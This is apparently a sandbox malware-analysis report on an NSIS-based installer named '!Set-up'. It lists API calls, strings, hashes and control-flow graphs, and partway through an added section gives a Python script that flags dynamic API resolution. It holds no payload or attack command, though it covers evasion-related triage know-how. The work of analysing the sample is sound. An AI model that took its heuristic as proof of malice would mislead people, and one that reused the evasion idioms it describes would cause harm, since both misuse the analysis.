API calls 4183->4194 4185 406ec9 4184->4185 4188 404f9e 25 API calls 4185->4188 4186 406cc7 72 API calls 4186->4194 4187 405e5c 2 API calls 4189 406dfa DeleteFileW 4187->4189 4190 406ed3 4188->4190 4189->4194 4191 406c94 42 API calls 4190->4191 4191->4193 4192 404f9e 25 API calls 4192->4175 4193->3935 4193->3936 4194->4169 4194->4175 4194->4183 4194->4186 4194->4187 4194->4192 4195 404f9e 25 API calls 4194->4195 4196 406c94 42 API calls 4194->4196 4198 406035 lstrcpynW 4194->4198 4195->4194 4196->4194 4197->4157 4198->4194 4199->4084 4955 401cb2 4956 40145c 18 API calls 4955->4956 4957 401c54 4956->4957 4958 4062cf 11 API calls 4957->4958 4959 401c64 4957->4959 4960 401c59 4958->4960 4961 406cc7 81 API calls 4960->4961 4961->4959 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4962 402238 4963 40145c 18 API calls 4962->4963 4964 40223e 4963->4964 4965 4062cf 11 API calls 4964->4965 4966 40224b 4965->4966 4967 404f9e 25 API calls 4966->4967 4968 402255 4967->4968 4969 405c6b 2 API calls 4968->4969 4970 40225b 4969->4970 4971 4062cf 11 API calls 4970->4971 4979 4022ac CloseHandle 4970->4979 4976 40226d 4971->4976 4973 4030e3 4974 402283 WaitForSingleObject 4975 402291 GetExitCodeProcess 4974->4975 4974->4976 4978 4022a3 4975->4978 4975->4979 4976->4974 4977 40635e 2 API calls 4976->4977 4976->4979 4977->4974 4981 405f7d wsprintfW 4978->4981 4979->4973 4981->4979 3781 401eb9 3782 401f24 3781->3782 3785 401ec6 3781->3785 3783 401f53 GlobalAlloc 3782->3783 3787 401f28 3782->3787 3789 406831 18 API calls 3783->3789 3784 401ed5 3788 4062cf 11 API calls 
3784->3788 3785->3784 3791 401ef7 3785->3791 3786 401f36 3805 406035 lstrcpynW 3786->3805 3787->3786 3790 4062cf 11 API calls 3787->3790 3800 401ee2 3788->3800 3793 401f46 3789->3793 3790->3786 3803 406035 lstrcpynW 3791->3803 3795 402708 3793->3795 3796 402387 GlobalFree 3793->3796 3796->3795 3797 401f06 3804 406035 lstrcpynW 3797->3804 3798 406831 18 API calls 3798->3800 3800->3795 3800->3798 3801 401f15 3806 406035 lstrcpynW 3801->3806 3803->3797 3804->3801 3805->3793 3806->3795 4982 404039 4983 404096 4982->4983 4984 404046 lstrcpynA lstrlenA 4982->4984 4984->4983 4985 404077 4984->4985 4985->4983 4986 404083 GlobalFree 4985->4986 4986->4983

                                                              Control-flow Graph (executed / not executed basic blocks; graph rendering not reproduced)
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                              • CloseClipboard.USER32 ref: 0040549A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                              • String ID: New install of "%s" to "%s"${
                                                              • API String ID: 2110491804-1641061399
                                                              • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                              • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                              Control-flow Graph (executed / not executed basic blocks; graph rendering not reproduced)
                                                              APIs
                                                              • #17.COMCTL32 ref: 004038CE
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                              • API String ID: 2435955865-3712954417
                                                              • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                              • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                              Control-flow Graph (executed / not executed basic blocks; graph rendering not reproduced)
                                                              APIs
                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406A73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 3581403547-1792361021
                                                              • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                              • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: jF
                                                              • API String ID: 2295610775-3349280890
                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                              • String ID:
                                                              • API String ID: 310444273-0
                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
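The three calls listed for the function at 00406328 (GetModuleHandleA, LoadLibraryA, GetProcAddress) are the textbook shape of runtime API resolution: obtain a module handle, fall back to loading the DLL, then look the export up by name, so the import table never shows what the code actually calls. When reading many such per-function entries it helps to parse the "APIs" lists mechanically and flag that triad. The script below is an added triage helper written for this page; it is not part of the report and not Joe Sandbox code. It relies only on the line shape visible above and on one detail that matters for not double-counting: lines the report prefixes with "Part of subcall function X:" belong to the callee X, not to the function whose entry they appear under. All names in it are the author's own; the sample lines are copied from this page.

```python
"""Parse the per-function "APIs" lists of a sandbox report and flag the
dynamic API-resolution idiom (GetModuleHandle*/LoadLibrary* + GetProcAddress).

Added triage helper, not part of the report or of Joe Sandbox. It only relies
on the line shape visible on the page:
    • Name.Module(args), ref: address
    • Part of subcall function X: Name.Module(args), ref: address
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"        # args are optional: "DestroyWindow.USER32 ref: ..."
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # callee address when the report attributes the
                                  # line to a subcall, None for a direct call


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per parseable line; anything else is skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            name=m["name"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def resolves_apis_dynamically(calls: List[ApiCall], direct_only: bool = True) -> bool:
    """True when one function both obtains a module handle (GetModuleHandle* or
    LoadLibrary*) and looks up an export with GetProcAddress. With direct_only
    the lines the report attributes to a subcall are ignored, so a mere caller
    of the resolver is not flagged as a resolver itself."""
    own = [c for c in calls if not (direct_only and c.subcall_of is not None)]
    names = {c.name for c in own}
    has_loader = any(n.startswith(("GetModuleHandle", "LoadLibrary")) for n in names)
    return has_loader and "GetProcAddress" in names


def calls_per_module(calls: List[ApiCall]) -> Dict[str, int]:
    """Direct calls per DLL: a USER32-dominated list is UI plumbing, KERNEL32/
    KERNELBASE-dominated lists are file, loader and process activity."""
    counts: Dict[str, int] = {}
    for c in calls:
        if c.subcall_of is None:
            counts[c.module] = counts.get(c.module, 0) + 1
    return counts


# Constructed samples, copied from the API lists shown on this page.
RESOLVER_APIS = """\
• GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
• GetProcAddress.KERNEL32(00000000), ref: 00406353
"""
# The function at 00405958 lists the same three calls, but only through a subcall.
CALLER_APIS = """\
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
"""

if __name__ == "__main__":
    for label, text in (("00406328", RESOLVER_APIS), ("00405958", CALLER_APIS)):
        calls = parse_api_lines(text)
        print(label, calls_per_module(calls),
              "dynamic resolver" if resolves_apis_dynamically(calls) else "caller only")
```

Run against the two samples, 00406328 is reported as the resolver and 00405958 only as a caller of it; pass `direct_only=False` to see the difference the subcall attribution makes. The loader-plus-GetProcAddress check is a heuristic, not proof of evasion: installer stubs and legitimate software use the same idiom for optional DLLs, so what the resolved names are (if the report recovers them) matters more than the fact of resolution.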

                                                              Control-flow Graph

                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                              APIs
                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                              • ShowWindow.USER32(?), ref: 00401753
                                                              • ShowWindow.USER32(?), ref: 00401767
                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
